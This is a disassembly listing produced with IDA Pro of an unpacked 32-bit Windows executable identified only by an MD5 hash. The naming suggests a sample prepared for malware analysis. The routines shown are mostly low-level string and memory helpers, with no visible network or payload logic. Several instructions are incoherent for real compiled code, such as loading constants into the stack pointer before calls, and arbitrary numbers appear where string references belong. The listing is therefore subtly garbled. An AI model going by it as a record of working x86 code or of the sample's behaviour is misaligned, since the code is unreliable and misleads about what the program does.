;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 9616EB1F23092F5BD1972493B384E1F5
; File Name : u:\work\9616eb1f23092f5bd1972493b384e1f5_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 0001C000 ( 114688.)
; Section size in file : 0001C000 ( 114688.)
; Offset to raw data for section: 00001000
; Flags C00000E0: Text Data Bss Readable Writable
; Alignment : default
unicode macro page,string,zero
irpc c,<string>
db '&c', page
endm
ifnb <zero>
dw zero
endif
endm
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write
seg000 segment para public 'BSS' use32
assume cs:seg000
;org 401000h
assume es:nothing, ss:nothing, ds:seg000, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401000 proc near ; CODE XREF: sub_401141+79�p
; sub_4011D3+25�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_402F72
mov eax, [ebp+arg_0]
add esp, 10h
pop ebp
retn
sub_401000 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40101C proc near ; CODE XREF: sub_4012AC+50�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_402BA0
mov eax, [ebp+arg_0]
add esp, 10h
pop ebp
retn
sub_40101C endp
; =============== S U B R O U T I N E =======================================
sub_401038 proc near ; DATA XREF: seg001:004219C4�o
mov dword ptr [ecx], offset off_41D314
jmp sub_402CCA
sub_401038 endp
; ---------------------------------------------------------------------------
loc_401043: ; DATA XREF: seg001:off_41D314�o
push esi
mov esi, ecx
mov dword ptr [esi], offset off_41D314
call sub_402CCA
test byte ptr [esp+8], 1
jz short loc_40105F
push esi
call sub_402F6D
pop ecx
loc_40105F: ; CODE XREF: seg000:00401056�j
mov eax, esi
pop esi
retn 4
; =============== S U B R O U T I N E =======================================
sub_401065 proc near ; CODE XREF: sub_40121E+43�p
; sub_4016BA+43�p ...
push 4
mov esi, 6B337Fh
call sub_4045CC
mov esi, ecx
mov [ebp-10h], esi
call sub_402BFB
and dword ptr [ebp-4], 0
push dword ptr [ebp+8]
lea ecx, [esi+0Ch]
mov dword ptr [esi], offset off_41D320
call sub_401111
mov eax, esi
call sub_40466B
retn 4
sub_401065 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40109A proc near ; CODE XREF: seg000:004010C8�p
; seg000:004010E7�j ...
push esi
mov esi, ecx
push 0
push 1
lea ecx, [esi+0Ch]
mov dword ptr [esi], offset off_41D320
call sub_4011D3
mov ecx, esi
pop esi
jmp sub_402CCA
sub_40109A endp
; =============== S U B R O U T I N E =======================================
sub_4010B7 proc near ; DATA XREF: seg001:0041D324�o
; seg001:0041D330�o ...
cmp dword ptr [ecx+24h], 10h
jb short loc_4010C1
mov eax, [ecx+10h]
retn
; ---------------------------------------------------------------------------
loc_4010C1: ; CODE XREF: sub_4010B7+4�j
lea eax, [ecx+10h]
retn
sub_4010B7 endp
; ---------------------------------------------------------------------------
loc_4010C5: ; DATA XREF: seg001:off_41D320�o
push esi
mov esi, ecx
call sub_40109A
test byte ptr [esp+8], 1
jz short loc_4010DB
push esi
call sub_402F6D
pop ecx
loc_4010DB: ; CODE XREF: seg000:004010D2�j
mov eax, esi
pop esi
retn 4
; ---------------------------------------------------------------------------
loc_4010E1: ; DATA XREF: seg001:0042198C�o
mov dword ptr [ecx], offset off_41D32C
jmp sub_40109A
; ---------------------------------------------------------------------------
loc_4010EC: ; DATA XREF: seg001:off_41D32C�o
push esi
mov esi, ecx
mov dword ptr [esi], offset off_41D32C
call sub_40109A
test byte ptr [esp+8], 1
jz short loc_401108
push esi
call sub_402F6D
pop ecx
loc_401108: ; CODE XREF: seg000:004010FF�j
mov eax, esi
pop esi
retn 4
; [00000003 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_401111 proc near ; CODE XREF: sub_401065+26�p
; sub_4013E6+2B�p
arg_0 = dword ptr 4
push esi
mov esi, ecx
push 0
mov dword ptr [esi+18h], 0Fh
call sub_40131B
push 0FFFFFFFFh
push 0
push [esp+0Ch+arg_0]
mov ecx, esi
call sub_401141
mov eax, esi
pop esi
retn 4
sub_401111 endp
; ---------------------------------------------------------------------------
loc_401137: ; CODE XREF: seg000:0041C1CE�j
; seg000:0041C24A�j ...
push 0
push 1
call sub_4011D3
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401141 proc near ; CODE XREF: sub_401111+1B�p
; sub_401547+2B�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, [ebp+arg_4]
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
cmp [edi+14h], eax
mov ebx, ecx
jnb short loc_401159
call sub_4026B9
loc_401159: ; CODE XREF: sub_401141+11�j
mov esi, [edi+14h]
mov eax, [ebp+arg_4]
sub esi, eax
cmp [ebp+arg_8], esi
jnb short loc_401169
mov esi, [ebp+arg_8]
loc_401169: ; CODE XREF: sub_401141+23�j
cmp ebx, edi
mov ecx, ebx
jnz short loc_401187
push 0FFFFFFFFh
add esi, eax
push esi
call sub_4012AC
push [ebp+arg_4]
mov ecx, ebx
push 0
call sub_4012AC
jmp short loc_4011CA
; ---------------------------------------------------------------------------
loc_401187: ; CODE XREF: sub_401141+2C�j
push 0
push esi
call sub_401337
test al, al
jz short loc_4011CA
cmp dword ptr [edi+18h], 10h
jb short loc_40119E
mov edi, [edi+4]
jmp short loc_4011A1
; ---------------------------------------------------------------------------
loc_40119E: ; CODE XREF: sub_401141+56�j
add edi, 4
loc_4011A1: ; CODE XREF: sub_401141+5B�j
mov ecx, [ebx+18h]
cmp ecx, 10h
jb short loc_4011AE
mov eax, [ebx+4]
jmp short loc_4011B1
; ---------------------------------------------------------------------------
loc_4011AE: ; CODE XREF: sub_401141+66�j
lea eax, [ebx+4]
loc_4011B1: ; CODE XREF: sub_401141+6B�j
mov edx, [ebp+arg_4]
push esi
add edi, edx
push edi
push ecx
push eax
call sub_401000
add esp, 10h
push esi
mov ecx, ebx
call sub_40131B
loc_4011CA: ; CODE XREF: sub_401141+44�j
; sub_401141+50�j
pop edi
pop esi
mov eax, ebx
pop ebx
pop ebp
retn 0Ch
sub_401141 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4011D3 proc near ; CODE XREF: sub_40109A+10�p
; seg000:0040113B�p ...
arg_0 = byte ptr 4
arg_4 = dword ptr 8
cmp [esp+arg_0], 0
push esi
mov esi, ecx
jz short loc_401208
cmp dword ptr [esi+18h], 10h
jb short loc_401208
cmp [esp+4+arg_4], 0
lea eax, [esi+4]
push edi
mov edi, [eax]
jbe short loc_401200
push [esp+8+arg_4]
push edi
push 10h
push eax
call sub_401000
add esp, 10h
loc_401200: ; CODE XREF: sub_4011D3+1B�j
push edi
call sub_402F6D
pop ecx
pop edi
loc_401208: ; CODE XREF: sub_4011D3+8�j
; sub_4011D3+E�j
push [esp+4+arg_4]
mov ecx, esi
mov dword ptr [esi+18h], 0Fh
call sub_40131B
pop esi
retn 8
sub_4011D3 endp
; =============== S U B R O U T I N E =======================================
sub_40121E proc near ; CODE XREF: sub_41BB84+4A�p
push 44h
mov ebx, 0EDECCDh
call sub_4045CC
push dword ptr [ebp+10h]
mov esi, [ebp+0Ch]
push dword ptr [esi+4]
push esi
call sub_401395
mov esp, 676F66h
sub ecx, ds:dword_433C44
cmp ecx, 1
jnb short loc_40127B
push 3BB7B3h
lea ecx, [ebp-28h]
call sub_401420
and dword ptr [ebp-4], 0
lea eax, [ebp-28h]
push eax
lea ecx, [ebp-50h]
call sub_401065
push 5DDBD9h
lea eax, [ebp-50h]
push eax
mov dword ptr [ebp-50h], offset off_41D32C
call sub_4041BB
loc_40127B: ; CODE XREF: sub_40121E+29�j
inc ds:dword_433C44
mov [esi+4], eax
mov ecx, [eax+4]
mov [ecx], eax
call sub_40466B
retn 0Ch
sub_40121E endp
; =============== S U B R O U T I N E =======================================
sub_401291 proc near ; CODE XREF: seg000:loc_41C370�p
push 2EEDECh
call sub_40304B
test eax, eax
pop ecx
jz short loc_4012A2
mov [eax], eax
loc_4012A2: ; CODE XREF: sub_401291+D�j
lea ecx, [eax+4]
test ecx, ecx
jz short locret_4012AB
mov [ecx], eax
locret_4012AB: ; CODE XREF: sub_401291+16�j
retn
sub_401291 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4012AC proc near ; CODE XREF: sub_401141+33�p
; sub_401141+3F�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push esi
push edi
mov edi, [ebp+arg_0]
mov esi, ecx
cmp [esi+14h], edi
jnb short loc_4012C0
call sub_4026B9
loc_4012C0: ; CODE XREF: sub_4012AC+D�j
mov eax, [esi+14h]
sub eax, edi
cmp eax, [ebp+arg_4]
jnb short loc_4012CD
mov [ebp+arg_4], eax
loc_4012CD: ; CODE XREF: sub_4012AC+1C�j
cmp [ebp+arg_4], 0
jbe short loc_401313
mov ecx, [esi+18h]
cmp ecx, 10h
push ebx
lea edx, [esi+4]
jb short loc_4012E3
mov ebx, [edx]
jmp short loc_4012E5
; ---------------------------------------------------------------------------
loc_4012E3: ; CODE XREF: sub_4012AC+31�j
mov ebx, edx
loc_4012E5: ; CODE XREF: sub_4012AC+35�j
cmp ecx, 10h
jb short loc_4012EC
mov edx, [edx]
loc_4012EC: ; CODE XREF: sub_4012AC+3C�j
sub eax, [ebp+arg_4]
add ebx, edi
add ebx, [ebp+arg_4]
push eax
push ebx
sub ecx, edi
push ecx
add edx, edi
push edx
call sub_40101C
mov eax, [esi+14h]
sub eax, [ebp+arg_4]
add esp, 10h
push eax
mov ecx, esi
call sub_40131B
pop ebx
loc_401313: ; CODE XREF: sub_4012AC+25�j
pop edi
mov eax, esi
pop esi
pop ebp
retn 8
sub_4012AC endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40131B proc near ; CODE XREF: sub_401111+C�p
; sub_401141+84�p ...
arg_0 = dword ptr 4
cmp dword ptr [ecx+18h], 10h
mov eax, [esp+arg_0]
mov [ecx+14h], eax
jb short loc_40132D
mov ecx, [ecx+4]
jmp short loc_401330
; ---------------------------------------------------------------------------
loc_40132D: ; CODE XREF: sub_40131B+B�j
add ecx, 4
loc_401330: ; CODE XREF: sub_40131B+10�j
mov byte ptr [ecx+eax], 0
retn 4
sub_40131B endp
; =============== S U B R O U T I N E =======================================
sub_401337 proc near ; CODE XREF: sub_401141+49�p
; sub_401547+39�p
arg_0 = dword ptr 4
arg_4 = byte ptr 8
push esi
push edi
mov edi, [esp+8+arg_0]
cmp edi, 0FFFFFFFEh
mov esi, ecx
jbe short loc_401349
call sub_40267A
loc_401349: ; CODE XREF: sub_401337+B�j
cmp [esi+18h], edi
jnb short loc_40135B
push dword ptr [esi+14h]
mov ecx, esi
push edi
call sub_401442
jmp short loc_401388
; ---------------------------------------------------------------------------
loc_40135B: ; CODE XREF: sub_401337+15�j
cmp [esp+8+arg_4], 0
jz short loc_40137C
cmp edi, 10h
jnb short loc_40137C
mov eax, [esi+14h]
cmp edi, eax
jnb short loc_401370
mov eax, edi
loc_401370: ; CODE XREF: sub_401337+35�j
push eax
push 1
mov ecx, esi
call sub_4011D3
jmp short loc_401388
; ---------------------------------------------------------------------------
loc_40137C: ; CODE XREF: sub_401337+29�j
; sub_401337+2E�j
test edi, edi
jnz short loc_401388
push edi
mov ecx, esi
call sub_40131B
loc_401388: ; CODE XREF: sub_401337+22�j
; sub_401337+43�j ...
xor eax, eax
cmp eax, edi
sbb eax, eax
pop edi
neg eax
pop esi
retn 8
sub_401337 endp
; =============== S U B R O U T I N E =======================================
sub_401395 proc near ; CODE XREF: sub_40121E+16�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push 5776F6h
call sub_40304B
test eax, eax
pop ecx
jz short loc_4013AA
mov ecx, [esp+arg_0]
mov [eax], ecx
loc_4013AA: ; CODE XREF: sub_401395+D�j
lea ecx, [eax+4]
test ecx, ecx
jz short loc_4013B7
mov edx, [esp+arg_4]
mov [ecx], edx
loc_4013B7: ; CODE XREF: sub_401395+1A�j
push edi
lea edi, [eax+8]
test edi, edi
jz short loc_4013CA
push esi
mov esi, [esp+8+arg_8]
push 41h
pop ecx
rep movsd
pop esi
loc_4013CA: ; CODE XREF: sub_401395+28�j
pop edi
retn 0Ch
sub_401395 endp
; ---------------------------------------------------------------------------
push esi
push dword ptr [esp+8]
mov esi, ecx
call sub_4013E6
mov dword ptr [esi], offset off_41D32C
mov eax, esi
pop esi
retn 4
; =============== S U B R O U T I N E =======================================
sub_4013E6 proc near ; CODE XREF: seg000:004013D5�p
; sub_4026B9+46�p
push 4
mov edi, 695DDBh
call sub_4045CC
mov esi, ecx
mov [ebp-10h], esi
mov edi, [ebp+8]
push edi
call sub_402C72
and dword ptr [ebp-4], 0
add edi, 0Ch
push edi
lea ecx, [esi+0Ch]
mov dword ptr [esi], offset off_41D320
call sub_401111
mov eax, esi
call sub_40466B
retn 4
sub_4013E6 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_401420 proc near ; CODE XREF: sub_40121E+33�p
; sub_4016BA+33�p ...
arg_0 = dword ptr 4
push esi
mov esi, ecx
push 0
mov dword ptr [esi+18h], 0Fh
call sub_40131B
push [esp+4+arg_0]
mov ecx, esi
call sub_401524
mov eax, esi
pop esi
retn 4
sub_401420 endp
; =============== S U B R O U T I N E =======================================
sub_401442 proc near ; CODE XREF: sub_401337+1D�p
push 0Ch
mov ebx, 0A695DDh
call sub_4045FF
mov edi, ecx
mov [ebp-18h], edi
mov esi, [ebp+8]
or esi, 0Fh
cmp esi, 0FFFFFFFEh
jbe short loc_401463
mov esi, [ebp+8]
jmp short loc_401488
; ---------------------------------------------------------------------------
loc_401463: ; CODE XREF: sub_401442+1A�j
xor edx, edx
push 3
mov eax, esi
pop ebx
div ebx
mov ecx, [edi+18h]
mov [ebp-14h], ecx
shr dword ptr [ebp-14h], 1
mov edx, [ebp-14h]
cmp eax, edx
jnb short loc_401488
push 0FFFFFFFEh
pop eax
sub eax, edx
cmp ecx, eax
ja short loc_401488
lea esi, [edx+ecx]
loc_401488: ; CODE XREF: sub_401442+1F�j
; sub_401442+38�j ...
and dword ptr [ebp-4], 0
lea eax, [esi+1]
push 0
push eax
call sub_4015ED
pop ecx
pop ecx
mov ebx, eax
jmp short loc_4014C7
; ---------------------------------------------------------------------------
loc_40149D: ; DATA XREF: seg001:00421A8C�o
mov eax, [ebp+8]
mov [ebp-10h], esp
mov [ebp+8], eax
inc eax
push 0
push eax
mov byte ptr [ebp-4], 2
call sub_4015ED
pop ecx
mov [ebp-14h], eax
pop ecx
mov ebp, 0ADB4AEh
retn
; ---------------------------------------------------------------------------
mov edi, [ebp-18h]
mov esi, [ebp+8]
mov ebx, [ebp-14h]
loc_4014C7: ; CODE XREF: sub_401442+59�j
cmp dword ptr [ebp+0Ch], 0
jbe short loc_4014EC
cmp dword ptr [edi+18h], 10h
jb short loc_4014D8
mov eax, [edi+4]
jmp short loc_4014DB
; ---------------------------------------------------------------------------
loc_4014D8: ; CODE XREF: sub_401442+8F�j
lea eax, [edi+4]
loc_4014DB: ; CODE XREF: sub_401442+94�j
push dword ptr [ebp+0Ch]
push eax
lea eax, [esi+1]
push eax
push ebx
call sub_401000
add esp, 10h
loc_4014EC: ; CODE XREF: sub_401442+89�j
push 0
push 1
mov ecx, edi
call sub_4011D3
push dword ptr [ebp+0Ch]
mov ecx, edi
mov [edi+4], ebx
mov [edi+18h], esi
call sub_40131B
call sub_40466B
retn 8
sub_401442 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40150F proc near ; DATA XREF: seg001:00421A7C�o
mov ecx, [ebp-18h]
xor esi, esi
push esi
push 1
call sub_4011D3
push esi
push esi
call sub_4041BB
int 3 ; Trap to Debugger
sub_40150F endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_401524 proc near ; CODE XREF: sub_401420+17�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
push esi
mov esi, ecx
lea edx, [eax+1]
loc_40152E: ; CODE XREF: sub_401524+F�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40152E
sub eax, edx
push eax
push [esp+8+arg_0]
mov ecx, esi
call sub_401547
pop esi
retn 4
sub_401524 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401547 proc near ; CODE XREF: sub_401524+1A�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push esi
push edi
mov edi, [ebp+arg_0]
push edi
mov esi, ecx
call sub_4015B9
test al, al
jz short loc_401579
cmp dword ptr [esi+18h], 10h
jb short loc_401566
mov eax, [esi+4]
jmp short loc_401569
; ---------------------------------------------------------------------------
loc_401566: ; CODE XREF: sub_401547+18�j
lea eax, [esi+4]
loc_401569: ; CODE XREF: sub_401547+1D�j
push [ebp+arg_4]
sub edi, eax
push edi
push esi
mov ecx, esi
call sub_401141
jmp short loc_4015B3
; ---------------------------------------------------------------------------
loc_401579: ; CODE XREF: sub_401547+12�j
push 0
push [ebp+arg_4]
mov ecx, esi
call sub_401337
test al, al
jz short loc_4015B1
mov ecx, [esi+18h]
cmp ecx, 10h
jb short loc_401596
mov eax, [esi+4]
jmp short loc_401599
; ---------------------------------------------------------------------------
loc_401596: ; CODE XREF: sub_401547+48�j
lea eax, [esi+4]
loc_401599: ; CODE XREF: sub_401547+4D�j
push [ebp+arg_4]
push edi
push ecx
push eax
call sub_401000
add esp, 10h
push [ebp+arg_4]
mov ecx, esi
call sub_40131B
loc_4015B1: ; CODE XREF: sub_401547+40�j
mov eax, esi
loc_4015B3: ; CODE XREF: sub_401547+30�j
pop edi
pop esi
pop ebp
retn 8
sub_401547 endp
; =============== S U B R O U T I N E =======================================
sub_4015B9 proc near ; CODE XREF: sub_401547+B�p
arg_0 = dword ptr 4
push esi
mov esi, [ecx+18h]
cmp esi, 10h
lea eax, [ecx+4]
jb short loc_4015C9
mov edx, [eax]
jmp short loc_4015CB
; ---------------------------------------------------------------------------
loc_4015C9: ; CODE XREF: sub_4015B9+A�j
mov edx, eax
loc_4015CB: ; CODE XREF: sub_4015B9+E�j
cmp [esp+4+arg_0], edx
jb short loc_4015E7
cmp esi, 10h
jb short loc_4015D8
mov eax, [eax]
loc_4015D8: ; CODE XREF: sub_4015B9+1B�j
mov ecx, [ecx+14h]
add ecx, eax
cmp ecx, [esp+4+arg_0]
jbe short loc_4015E7
mov al, 1
jmp short loc_4015E9
; ---------------------------------------------------------------------------
loc_4015E7: ; CODE XREF: sub_4015B9+16�j
; sub_4015B9+28�j
xor al, al
loc_4015E9: ; CODE XREF: sub_4015B9+2C�j
pop esi
retn 4
sub_4015B9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4015ED proc near ; CODE XREF: sub_401442+50�p
; sub_401442+6C�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov ecx, [ebp+arg_0]
sub esp, 0Ch
test ecx, ecx
ja short loc_401605
xor ecx, ecx
loc_4015FC: ; CODE XREF: sub_4015ED+22�j
push ecx
call sub_40304B
pop ecx
leave
retn
; ---------------------------------------------------------------------------
loc_401605: ; CODE XREF: sub_4015ED+B�j
or eax, 0FFFFFFFFh
xor edx, edx
div ecx
cmp eax, 1
jnb short loc_4015FC
and [ebp+arg_0], 0
lea eax, [ebp+arg_0]
push eax
lea ecx, [ebp+var_C]
call sub_402C0C
push 5EDA57h
lea eax, [ebp+var_C]
push eax
mov [ebp+var_C], offset off_41D314
call sub_4041BB
int 3 ; Trap to Debugger
push esi
push [esp+10h+var_8]
mov esi, ecx
call sub_402C72
mov dword ptr [esi], offset off_41D314
mov eax, esi
pop esi
retn 4
sub_4015ED endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40164F proc near ; CODE XREF: sub_40243A+47�p
; sub_40243A:loc_4024A3�p ...
cmp dword ptr [esi], 0
jnz short loc_401659
call sub_402F5D
loc_401659: ; CODE XREF: sub_40164F+3�j
mov eax, [esi]
mov ecx, [esi+4]
cmp ecx, [eax+4]
jnz short loc_401668
call sub_402F5D
loc_401668: ; CODE XREF: sub_40164F+12�j
mov eax, [esi+4]
add eax, 8
retn
sub_40164F endp
; =============== S U B R O U T I N E =======================================
sub_40166F proc near ; CODE XREF: sub_40243A+39�p
; sub_413F8F+2F�p ...
mov eax, [esi]
test eax, eax
jz short loc_401679
cmp eax, [edi]
jz short loc_40167E
loc_401679: ; CODE XREF: sub_40166F+4�j
call sub_402F5D
loc_40167E: ; CODE XREF: sub_40166F+8�j
mov eax, [esi+4]
xor ecx, ecx
cmp eax, [edi+4]
setnz cl
mov al, cl
retn
sub_40166F endp
; =============== S U B R O U T I N E =======================================
sub_40168C proc near ; CODE XREF: sub_40243A+62�p
; sub_413F8F+47�p ...
cmp dword ptr [esi], 0
mov eax, [esi]
mov [edi], eax
mov eax, [esi+4]
mov [edi+4], eax
jnz short loc_4016A0
call sub_402F5D
loc_4016A0: ; CODE XREF: sub_40168C+D�j
mov eax, [esi]
mov ecx, [esi+4]
cmp ecx, [eax+4]
jnz short loc_4016AF
call sub_402F5D
loc_4016AF: ; CODE XREF: sub_40168C+1C�j
mov eax, [esi+4]
mov eax, [eax]
mov [esi+4], eax
mov eax, edi
retn
sub_40168C endp
; =============== S U B R O U T I N E =======================================
sub_4016BA proc near ; CODE XREF: sub_4140AB+54�p
push 48h
mov edx, 4B7B69h
call sub_4045CC
push dword ptr [ebp+8]
mov esi, [ebp+10h]
push dword ptr [esi+4]
push esi
call sub_401745
mov ecx, 3C3C3C3h
sub ecx, ds:dword_433C50
cmp ecx, 1
jnb short loc_401717
push 2DBDB4h
lea ecx, [ebp-2Ch]
call sub_401420
and dword ptr [ebp-4], 0
lea eax, [ebp-2Ch]
push eax
lea ecx, [ebp-54h]
call sub_401065
push 16DEDAh
lea eax, [ebp-54h]
push eax
mov dword ptr [ebp-54h], offset off_41D32C
call sub_4041BB
loc_401717: ; CODE XREF: sub_4016BA+29�j
inc ds:dword_433C50
mov [esi+4], eax
mov ecx, [eax+4]
mov [ecx], eax
call sub_40466B
retn 0Ch
sub_4016BA endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40172D proc near ; CODE XREF: seg000:loc_41C38D�p
push 4Ch
call sub_40304B
test eax, eax
pop ecx
jz short loc_40173B
mov [eax], eax
loc_40173B: ; CODE XREF: sub_40172D+A�j
lea ecx, [eax+4]
test ecx, ecx
jz short locret_401744
mov [ecx], eax
locret_401744: ; CODE XREF: sub_40172D+13�j
retn
sub_40172D endp
; =============== S U B R O U T I N E =======================================
sub_401745 proc near ; CODE XREF: sub_4016BA+16�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push 4Ch
call sub_40304B
test eax, eax
pop ecx
jz short loc_401757
mov ecx, [esp+arg_0]
mov [eax], ecx
loc_401757: ; CODE XREF: sub_401745+A�j
lea ecx, [eax+4]
test ecx, ecx
jz short loc_401764
mov edx, [esp+arg_4]
mov [ecx], edx
loc_401764: ; CODE XREF: sub_401745+17�j
push edi
lea edi, [eax+8]
test edi, edi
jz short loc_401777
push esi
mov esi, [esp+8+arg_8]
push 11h
pop ecx
rep movsd
pop esi
loc_401777: ; CODE XREF: sub_401745+25�j
pop edi
retn 0Ch
sub_401745 endp
; =============== S U B R O U T I N E =======================================
sub_40177B proc near ; DATA XREF: seg001:off_420AE4�o
push 0B6F6Dh
mov esi, 685B7Bh
call sub_404635
cmp dword ptr [ebp+1Ch], 3
mov eax, [ebp+10h]
mov edi, [ebp+20h]
mov [ebp-4C4h], eax
mov eax, [ebp+18h]
mov [ebp-4BCh], eax
mov [ebp-4C0h], edi
jl loc_4019D5
mov edi, 8685B7h
xor ebx, ebx
push esi
lea eax, [ebp-18Fh]
push ebx
push eax
mov [ebp-190h], bl
call sub_407B70
push esi
lea eax, [ebp-0CFh]
push ebx
push eax
mov [ebp-0D0h], bl
call sub_407B70
push dword ptr [edi+4]
lea edi, [ebp-190h]
call sub_41B7F9
push offset byte_4342DB
lea esi, [ebp-0D0h]
mov ebx, 4342Dh
call sub_4196D1
add esp, 20h
cmp byte ptr [ebp+8], 0
jz short loc_401817
cmp ds:byte_425222, 0
jz loc_4019EB
loc_401817: ; CODE XREF: sub_40177B+8D�j
lea ecx, [ebp-0D0h]
lea eax, [ebp-190h]
loc_401823: ; CODE XREF: sub_40177B+C0�j
mov dl, [eax]
cmp dl, [ecx]
jnz short loc_401841
test dl, dl
jz short loc_40183D
mov dl, [eax+1]
cmp dl, [ecx+1]
jnz short loc_401841
inc eax
inc eax
inc ecx
inc ecx
test dl, dl
jnz short loc_401823
loc_40183D: ; CODE XREF: sub_40177B+B0�j
xor eax, eax
jmp short loc_401846
; ---------------------------------------------------------------------------
loc_401841: ; CODE XREF: sub_40177B+AC�j
; sub_40177B+B8�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_401846: ; CODE XREF: sub_40177B+C4�j
test eax, eax
jnz loc_4019C8
push 0A1A16h
push eax
lea eax, [ebp-4B8h]
push eax
call sub_407B70
push dword ptr [ebp-4BCh]
mov eax, 0C62868h
push esi
mov ebx, 0C358A1h
lea eax, [ebp-4B8h]
push edi
push eax
call sub_402AEE
lea eax, [ebp-4B8h]
add esp, 1Ch
lea ecx, [eax+1]
loc_40188A: ; CODE XREF: sub_40177B+114�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40188A
push dword ptr [ebp-4C4h]
sub eax, ecx
push esi
mov [ebp+eax-4B8h], dl
lea eax, [ebp-3B8h]
push 22h
push eax
call sub_402AEE
lea eax, [ebp-3B8h]
add esp, 10h
lea ecx, [eax+1]
loc_4018BB: ; CODE XREF: sub_40177B+145�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_4018BB
mov ebx, [ebp-4C0h]
push dword ptr [ebx+8]
sub eax, ecx
push esi
mov [ebp+eax-3B8h], dl
lea eax, [ebp-395h]
push edi
push eax
call sub_402AEE
lea eax, [ebp-395h]
add esp, 10h
lea ecx, [eax+1]
loc_4018EE: ; CODE XREF: sub_40177B+178�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_4018EE
push dword ptr [ebx+0Ch]
sub eax, ecx
push esi
mov [ebp+eax-395h], dl
lea eax, [ebp-295h]
push edi
push eax
call sub_402AEE
lea eax, [ebp-295h]
add esp, 10h
lea esi, [eax+1]
loc_40191B: ; CODE XREF: sub_40177B+1A5�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40191B
sub eax, esi
mov [ebp+eax-295h], cl
mov al, [ebp+8]
mov [ebp-192h], al
mov al, [ebp+0Ch]
push 4
mov [ebp-193h], al
pop eax
cmp [ebp+1Ch], eax
jl short loc_40198B
mov [ebp-4BCh], eax
loc_40194B: ; CODE XREF: sub_40177B+203�j
mov eax, [ebx+eax*4]
push 3
mov ecx, 0AC358h
mov esi, eax
pop ecx
xor edx, edx
repe cmpsb
jz short loc_401982
mov esi, eax
push 2
mov edx, 46B0Dh
pop ecx
xor eax, eax
repe cmpsb
jz short loc_401982
mov eax, [ebp-4BCh]
inc eax
cmp eax, [ebp+1Ch]
mov [ebp-4BCh], eax
jle short loc_40194B
jmp short loc_401992
; ---------------------------------------------------------------------------
loc_401982: ; CODE XREF: sub_40177B+1E1�j
; sub_40177B+1F1�j
mov byte ptr [ebp-195h], 1
jmp short loc_401992
; ---------------------------------------------------------------------------
loc_40198B: ; CODE XREF: sub_40177B+1C8�j
mov byte ptr [ebp-195h], 0
loc_401992: ; CODE XREF: sub_40177B+205�j
; sub_40177B+20E�j
push 8
mov byte ptr [ebp-194h], 0
call sub_40304B
pop ecx
mov [ebp-4C0h], eax
and dword ptr [ebp-4], 0
test eax, eax
jz short loc_4019EB
push 23586h
lea ecx, [ebp-4B8h]
mov esp, 0E608D6h
mov esi, eax
call sub_4140AB
jmp short loc_4019EB
; ---------------------------------------------------------------------------
loc_4019C8: ; CODE XREF: sub_40177B+CD�j
push 73046Bh
push dword ptr [ebp-4BCh]
jmp short loc_4019DB
; ---------------------------------------------------------------------------
loc_4019D5: ; CODE XREF: sub_40177B+2E�j
push 398235h
push eax
loc_4019DB: ; CODE XREF: sub_40177B+258�j
push dword ptr [ebp+0Ch]
push 1CC11Ah
call sub_417361
add esp, 10h
loc_4019EB: ; CODE XREF: sub_40177B+96�j
; sub_40177B+232�j ...
call sub_40467F
retn 1Ch
sub_40177B endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
